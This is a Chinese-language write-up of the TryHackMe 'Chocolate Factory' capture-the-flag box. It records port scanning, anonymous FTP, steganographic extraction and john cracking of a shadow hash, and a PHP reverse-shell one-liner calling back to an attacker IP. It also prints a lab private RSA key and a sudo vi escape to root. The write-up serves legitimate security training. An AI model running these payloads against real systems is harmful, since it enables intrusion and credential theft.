【Tryhackme】Chocolate Factory(sduo滥用提权:vi)
服务发现
┌──(root?kali)-[~/tryhackme/ChocolateFactory] └─# nmap -sV -Pn 10.10.164.40 -p- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-29 22:47 EDT Nmap scan report for 10.10.164.40 Host is up (0.31s latency). Not shown: 65506 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 100/tcp open newacct? 101/tcp open hostname? 102/tcp open iso-tsap? 103/tcp open gppitnp? 104/tcp open acr-nema? 105/tcp open csnet-ns? 106/tcp open pop3pw? 107/tcp open rtelnet? 108/tcp open snagas? 109/tcp open pop2? 110/tcp open pop3? 111/tcp open rpcbind? 112/tcp open mcidas? 113/tcp open ident? 114/tcp open audionews? 115/tcp open sftp? 116/tcp open ansanotify? 117/tcp open uucp-path? 118/tcp open sqlserv? 119/tcp open nntp? 120/tcp open cfdptkt? 121/tcp open erpc? 122/tcp open smakynet? 123/tcp open ntp? 124/tcp open ansatrader? 125/tcp open locus-map? 9 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
目录爆破无发现
┌──(root?kali)-[~/dirsearch] └─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.164.40 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521 Error Log: /root/dirsearch/logs/errors-21-09-29_22-41-59.log Target: http://10.10.164.40 [22:41:59] Starting: [22:42:08] 200 - 1KB - / [22:47:23] 403 - 277B - /server-status Task Completed
ftp服务可以匿名登录,把里面的文件下载本地分析
┌──(root?kali)-[~/tryhackme/ChocolateFactory] └─# ftp 10.10.164.40 Connected to 10.10.164.40. 220 (vsFTPd 3.0.3) Name (10.10.164.40:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 1000 1000 208838 Sep 30 2020 gum_room.jpg 226 Directory send OK. ftp> get gum_room.jpg local: gum_room.jpg remote: gum_room.jpg 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for gum_room.jpg (208838 bytes). 226 Transfer complete. 208838 bytes received in 3.45 secs (59.0388 kB/s) ftp>
用steghide分离jpg里的文件,得到一个b64.txt
,其实就是base64的密文
┌──(root?kali)-[~/tryhackme/ChocolateFactory] └─# steghide extract -sf gum_room.jpg Enter passphrase: wrote extracted data to "b64.txt". ┌──(root?kali)-[~/tryhackme/ChocolateFactory] └─# ls b64.txt gum_room.jpg ┌──(root?kali)-[~/tryhackme/ChocolateFactory] └─# cat b64.txt ZGFlbW9uOio6MTgzODA6MDo5OTk5OTo3Ojo6CmJpbjoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpzeXM6 KjoxODM4MDowOjk5OTk5Ojc6OjoKc3luYzoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpnYW1lczoqOjE4 MzgwOjA6OTk5OTk6Nzo6OgptYW46KjoxODM4MDowOjk5OTk5Ojc6OjoKbHA6KjoxODM4MDowOjk5 OTk5Ojc6OjoKbWFpbDoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpuZXdzOio6MTgzODA6MDo5OTk5OTo3 Ojo6CnV1Y3A6KjoxODM4MDowOjk5OTk5Ojc6OjoKcHJveHk6KjoxODM4MDowOjk5OTk5Ojc6OjoK d3d3LWRhdGE6KjoxODM4MDowOjk5OTk5Ojc6OjoKYmFja3VwOio6MTgzODA6MDo5OTk5OTo3Ojo6 Cmxpc3Q6KjoxODM4MDowOjk5OTk5Ojc6OjoKaXJjOio6MTgzODA6MDo5OTk5OTo3Ojo6CmduYXRz Oio6MTgzODA6MDo5OTk5OTo3Ojo6Cm5vYm9keToqOjE4MzgwOjA6OTk5OTk6Nzo6OgpzeXN0ZW1k LXRpbWVzeW5jOio6MTgzODA6MDo5OTk5OTo3Ojo6CnN5c3RlbWQtbmV0d29yazoqOjE4MzgwOjA6 OTk5OTk6Nzo6OgpzeXN0ZW1kLXJlc29sdmU6KjoxODM4MDowOjk5OTk5Ojc6OjoKX2FwdDoqOjE4 MzgwOjA6OTk5OTk6Nzo6OgpteXNxbDohOjE4MzgyOjA6OTk5OTk6Nzo6Ogp0c3M6KjoxODM4Mjow Ojk5OTk5Ojc6OjoKc2hlbGxpbmFib3g6KjoxODM4MjowOjk5OTk5Ojc6OjoKc3Ryb25nc3dhbjoq OjE4MzgyOjA6OTk5OTk6Nzo6OgpudHA6KjoxODM4MjowOjk5OTk5Ojc6OjoKbWVzc2FnZWJ1czoq OjE4MzgyOjA6OTk5OTk6Nzo6OgphcnB3YXRjaDohOjE4MzgyOjA6OTk5OTk6Nzo6OgpEZWJpYW4t ZXhpbTohOjE4MzgyOjA6OTk5OTk6Nzo6Ogp1dWlkZDoqOjE4MzgyOjA6OTk5OTk6Nzo6OgpkZWJp YW4tdG9yOio6MTgzODI6MDo5OTk5OTo3Ojo6CnJlZHNvY2tzOiE6MTgzODI6MDo5OTk5OTo3Ojo6 CmZyZWVyYWQ6KjoxODM4MjowOjk5OTk5Ojc6OjoKaW9kaW5lOio6MTgzODI6MDo5OTk5OTo3Ojo6 CnRjcGR1bXA6KjoxODM4MjowOjk5OTk5Ojc6OjoKbWlyZWRvOio6MTgzODI6MDo5OTk5OTo3Ojo6 CmRuc21hc3E6KjoxODM4MjowOjk5OTk5Ojc6OjoKcmVkaXM6KjoxODM4MjowOjk5OTk5Ojc6OjoK dXNibXV4Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnJ0a2l0Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnNz aGQ6KjoxODM4MjowOjk5OTk5Ojc6OjoKcG9zdGdyZXM6KjoxODM4MjowOjk5OTk5Ojc6OjoKYXZh aGk6KjoxODM4MjowOjk5OTk5Ojc6OjoKc3R1bm5lbDQ6IToxODM4MjowOjk5OTk5Ojc6OjoKc3Ns aDohOjE4MzgyOjA6OTk5OTk6Nzo6OgpubS1vcGVudnBuOio6MTgzODI6MDo5OTk5OTo3Ojo6Cm5t LW9wZW5jb25uZWN0Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnB1bHNlOio6MTgzODI6MDo5OTk5OTo3 Ojo6CnNhbmVkOio6MTgzODI6MDo5OTk5OTo3Ojo6CmluZXRzaW06KjoxODM4MjowOjk5OTk5Ojc6 OjoKY29sb3JkOio6MTgzODI6MDo5OTk5OTo3Ojo6CmkycHN2YzoqOjE4MzgyOjA6OTk5OTk6Nzo6 OgpkcmFkaXM6KjoxODM4MjowOjk5OTk5Ojc6OjoKYmVlZi14c3M6KjoxODM4MjowOjk5OTk5Ojc6 OjoKZ2VvY2x1ZToqOjE4MzgyOjA6OTk5OTk6Nzo6OgpsaWdodGRtOio6MTgzODI6MDo5OTk5OTo3 Ojo6CmtpbmctcGhpc2hlcjoqOjE4MzgyOjA6OTk5OTk6Nzo6OgpzeXN0ZW1kLWNvcmVkdW1wOiEh OjE4Mzk2Ojo6Ojo6Cl9ycGM6KjoxODQ1MTowOjk5OTk5Ojc6OjoKc3RhdGQ6KjoxODQ1MTowOjk5 OTk5Ojc6OjoKX2d2bToqOjE4NDk2OjA6OTk5OTk6Nzo6OgpjaGFybGllOiQ2JENaSm5DUGVRV3A5 L2pwTngka2hHbEZkSUNKbnI4UjNKQy9qVFIycjdEcmJGTHA4enE4NDY5ZDNjMC56dUtONHNlNjFG T2J3V0d4Y0hacU8yUkpIa2tMMWpqUFllZUd5SUpXRTgyWC86MTg1MzU6MDo5OTk5OTo3Ojo6Cg==
解密出来是:
daemon:*:18380:0:99999:7::: bin:*:18380:0:99999:7::: sys:*:18380:0:99999:7::: sync:*:18380:0:99999:7::: games:*:18380:0:99999:7::: man:*:18380:0:99999:7::: lp:*:18380:0:99999:7::: mail:*:18380:0:99999:7::: news:*:18380:0:99999:7::: uucp:*:18380:0:99999:7::: proxy:*:18380:0:99999:7::: www-data:*:18380:0:99999:7::: backup:*:18380:0:99999:7::: list:*:18380:0:99999:7::: irc:*:18380:0:99999:7::: gnats:*:18380:0:99999:7::: nobody:*:18380:0:99999:7::: systemd-timesync:*:18380:0:99999:7::: systemd-network:*:18380:0:99999:7::: systemd-resolve:*:18380:0:99999:7::: _apt:*:18380:0:99999:7::: mysql:!:18382:0:99999:7::: tss:*:18382:0:99999:7::: shellinabox:*:18382:0:99999:7::: strongswan:*:18382:0:99999:7::: ntp:*:18382:0:99999:7::: messagebus:*:18382:0:99999:7::: arpwatch:!:18382:0:99999:7::: Debian-exim:!:18382:0:99999:7::: uuidd:*:18382:0:99999:7::: debian-tor:*:18382:0:99999:7::: redsocks:!:18382:0:99999:7::: freerad:*:18382:0:99999:7::: iodine:*:18382:0:99999:7::: tcpdump:*:18382:0:99999:7::: miredo:*:18382:0:99999:7::: dnsmasq:*:18382:0:99999:7::: redis:*:18382:0:99999:7::: usbmux:*:18382:0:99999:7::: rtkit:*:18382:0:99999:7::: sshd:*:18382:0:99999:7::: postgres:*:18382:0:99999:7::: avahi:*:18382:0:99999:7::: stunnel4:!:18382:0:99999:7::: sslh:!:18382:0:99999:7::: nm-openvpn:*:18382:0:99999:7::: nm-openconnect:*:18382:0:99999:7::: pulse:*:18382:0:99999:7::: saned:*:18382:0:99999:7::: inetsim:*:18382:0:99999:7::: colord:*:18382:0:99999:7::: i2psvc:*:18382:0:99999:7::: dradis:*:18382:0:99999:7::: beef-xss:*:18382:0:99999:7::: geoclue:*:18382:0:99999:7::: lightdm:*:18382:0:99999:7::: king-phisher:*:18382:0:99999:7::: systemd-coredump:!!:18396:::::: _rpc:*:18451:0:99999:7::: statd:*:18451:0:99999:7::: _gvm:*:18496:0:99999:7::: charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::
看上去是/etc/shadow里的文件内容
把charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/
保存到hash.txt
用john去破解
┌──(root?kali)-[~/tryhackme/ChocolateFactory] └─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status cn7824 (charlie) 1g 0:00:12:04 DONE (2021-09-29 23:29) 0.001379g/s 1358p/s 1358c/s 1358C/s cocker6..cn123 Use the "--show" option to display all of the cracked passwords reliably Session completed
获得凭证charlie:cn7824
以为是ssh密码,但其实不是。
打开http://10.10.164.40/,是一个登陆页面,用上面的凭证登录,会重定向到home.php
此页面有一个命令行输入框,可以执行linux命令
也就是从这里我们可以获得一个反弹shell
使用下面payload获得反弹shell
php -r '$sock=fsockopen("10.13.21.169",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
在charlie家目录拿到id_rsa
$ cat user.txt cat: user.txt: Permission denied $ ls -alh total 40K drwxr-xr-x 5 charlie charley 4.0K Oct 7 2020 . drwxr-xr-x 3 root root 4.0K Oct 1 2020 .. -rw-r--r-- 1 charlie charley 3.7K Apr 4 2018 .bashrc drwx------ 2 charlie charley 4.0K Sep 1 2020 .cache drwx------ 3 charlie charley 4.0K Sep 1 2020 .gnupg drwxrwxr-x 3 charlie charley 4.0K Sep 29 2020 .local -rw-r--r-- 1 charlie charley 807 Apr 4 2018 .profile -rw-r--r-- 1 charlie charley 1.7K Oct 6 2020 teleport -rw-r--r-- 1 charlie charley 407 Oct 6 2020 teleport.pub -rw-r----- 1 charlie charley 39 Oct 6 2020 user.txt $ cat teleport -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEA4adrPc3Uh98RYDrZ8CUBDgWLENUybF60lMk9YQOBDR+gpuRW 1AzL12K35/Mi3Vwtp0NSwmlS7ha4y9sv2kPXv8lFOmLi1FV2hqlQPLw/unnEFwUb L4KBqBemIDefV5pxMmCqqguJXIkzklAIXNYhfxLr8cBS/HJoh/7qmLqrDoXNhwYj B3zgov7RUtk15Jv11D0Itsyr54pvYhCQgdoorU7l42EZJayIomHKon1jkofd1/oY fOBwgz6JOlNH1jFJoyIZg2OmEhnSjUltZ9mSzmQyv3M4AORQo3ZeLb+zbnSJycEE RaObPlb0dRy3KoN79lt+dh+jSg/dM/TYYe5L4wIDAQABAoIBAD2TzjQDYyfgu4Ej Di32Kx+Ea7qgMy5XebfQYquCpUjLhK+GSBt9knKoQb9OHgmCCgNG3+Klkzfdg3g9 zAUn1kxDxFx2d6ex2rJMqdSpGkrsx5HwlsaUOoWATpkkFJt3TcSNlITquQVDe4tF w8JxvJpMs445CWxSXCwgaCxdZCiF33C0CtVw6zvOdF6MoOimVZf36UkXI2FmdZFl kR7MGsagAwRn1moCvQ7lNpYcqDDNf6jKnx5Sk83R5bVAAjV6ktZ9uEN8NItM/ppZ j4PM6/IIPw2jQ8WzUoi/JG7aXJnBE4bm53qo2B4oVu3PihZ7tKkLZq3Oclrrkbn2 EY0ndcECgYEA/29MMD3FEYcMCy+KQfEU2h9manqQmRMDDaBHkajq20KvGvnT1U/T RcbPNBaQMoSj6YrVhvgy3xtEdEHHBJO5qnq8TsLaSovQZxDifaGTaLaWgswc0biF uAKE2uKcpVCTSewbJyNewwTljhV9mMyn/piAtRlGXkzeyZ9/muZdtesCgYEA4idA KuEj2FE7M+MM/+ZeiZvLjKSNbiYYUPuDcsoWYxQCp0q8HmtjyAQizKo6DlXIPCCQ RZSvmU1T3nk9MoTgDjkNO1xxbF2N7ihnBkHjOffod+zkNQbvzIDa4Q2owpeHZL19 znQV98mrRaYDb5YsaEj0YoKfb8xhZJPyEb+v6+kCgYAZwE+vAVsvtCyrqARJN5PB la7Oh0Kym+8P3Zu5fI0Iw8VBc/Q+KgkDnNJgzvGElkisD7oNHFKMmYQiMEtvE7GB FVSMoCo/n67H5TTgM3zX7qhn0UoKfo7EiUR5iKUAKYpfxnTKUk+IW6ME2vfJgsBg 82DuYPjuItPHAdRselLyNwKBgH77Rv5Ml9HYGoPR0vTEpwRhI/N+WaMlZLXj4zTK 37MWAz9nqSTza31dRSTh1+NAq0OHjTpkeAx97L+YF5KMJToXMqTIDS+pgA3fRamv ySQ9XJwpuSFFGdQb7co73ywT5QPdmgwYBlWxOKfMxVUcXybW/9FoQpmFipHsuBjb Jq4xAoGBAIQnMPLpKqBk/ZV+HXmdJYSrf2MACWwL4pQO9bQUeta0rZA6iQwvLrkM Qxg3lN2/1dnebKK5lEd2qFP1WLQUJqypo5TznXQ7tv0Uuw7o0cy5XNMFVwn/BqQm G2QwOAGbsQHcI0P19XgHTOB7Dm69rP9j1wIRBOF7iGfwhWdi+vln -----END RSA PRIVATE KEY-----
把私钥保存成一个id_rsa文件,使用ssh登录charlie的账号,拿到user.txt
┌──(root?kali)-[~/tryhackme/ChocolateFactory] └─# ssh -i id_rsa charlie@10.10.164.40 Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-115-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Sep 30 03:56:19 UTC 2021 System load: 0.08 Processes: 1206 Usage of /: 44.0% of 8.79GB Users logged in: 0 Memory usage: 49% IP address for eth0: 10.10.164.40 Swap usage: 0% 0 packages can be updated. 0 updates are security updates. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Oct 7 16:10:44 2020 from 10.0.2.5 Could not chdir to home directory /home/charley: No such file or directory To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. charlie@chocolate-factory:/$ cat /home/charlie/user.txt flag{cd5509042371b34e4826e4838b522d2e}
查看sudo -l,发现可以无密码使用vi命令
charlie@chocolate-factory:/$ sudo -l Matching Defaults entries for charlie on chocolate-factory: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User charlie may run the following commands on chocolate-factory: (ALL : !root) NOPASSWD: /usr/bin/vi
用sudo vi -c ':!/bin/sh' /dev/null
提权到root
charlie@chocolate-factory:/$ sudo vi -c ':!/bin/sh' /dev/null # id uid=0(root) gid=0(root) groups=0(root) # whoami root # cat /root/root.txt cat: /root/root.txt: No such file or directory
但是root flag藏在一个叫root.py
的文件里,源码如下
from cryptography.fernet import Fernet import pyfiglet key=input("Enter the key: ") f=Fernet(key) encrypted_mess= 'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ' dcrypt_mess=f.decrypt(encrypted_mess) mess=dcrypt_mess.decode() display1=pyfiglet.figlet_format("You Are Now The Owner Of ") display2=pyfiglet.figlet_format("Chocolate Factory ") print(display1) print(display2) print(mess)
这个脚本执行需要输入一个key,这个key我估计就是第一个问题里的答案
到处找,在/var/www/html
里找到一个key_rev_key
的文件,目录爆破的时候居然没有爆出来。下载到本地分析
用head查看文件头
└─# head key_rev_key ELF>�@�@8 @@@@�888� � hh/lib64/ld-linux-x86-64.so.2GNUGNU�s�ŗ5d� tz�~������ ▒0MF� � � � � � � 7"libc.so.6__isoc99_scanfputs__stack_chk_failprintf__cxa_finalizestrcmp__libc_start_mainGLIBC_2.7GLIBC_2.4GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableii ]��f.�]�@f.�H�= H�5 UH)�H��H��H��H��?H�H��t▒H� H��t�����%b h������%Z h������%R h������%J h������%b f�1�I��^H��H���PTL�*H� ]��f�]�@f.��= u/H�= UH��t ����H���� ]����fDUH��]�f���UH��H��@�}�H�u�dH�%(H�E�1�H�=)������H�E�H��H�=#������H�E�H�5H���l�����u5H�= s congratulations you have found the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=' Keep its safeBad name!8���������� ���T���������L���,zRx ����+zRx $���`F▒J � �?▒;*3$"DH��J����A�C
留意有一行字:congratulations you have found the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
所以key是:b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
拿到root flag
# python root.py Enter the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=' __ __ _ _ _ _____ _ / /__ _ _ / _ __ ___ | | | _____ __ |_ _| |__ ___ V / _ | | | | / _ | '__/ _ | | |/ _ / / / | | | '_ / _ | | (_) | |_| | / ___ | | | __/ | | | (_) V V / | | | | | | __/ |_|___/ __,_| /_/ __| ___| |_| _|___/ _/_/ |_| |_| |_|___| ___ ___ __ / _ __ ___ __ ___ _ __ / _ / _| | | | / / / '_ / _ '__| | | | | |_ | |_| | V V /| | | | __/ | | |_| | _| ___/ _/_/ |_| |_|___|_| ___/|_| ____ _ _ _ / ___| |__ ___ ___ ___ | | __ _| |_ ___ | | | '_ / _ / __/ _ | |/ _` | __/ _ | |___| | | | (_) | (_| (_) | | (_| | || __/ ____|_| |_|___/ ______/|_|__,_|_____| _____ _ | ___|_ _ ___| |_ ___ _ __ _ _ | |_ / _` |/ __| __/ _ | '__| | | | | _| (_| | (__| || (_) | | | |_| | |_| __,_|___|_____/|_| __, | |___/ flag{cec59161d338fef787fcb4e296b42124} #
[温馨提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。]
[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]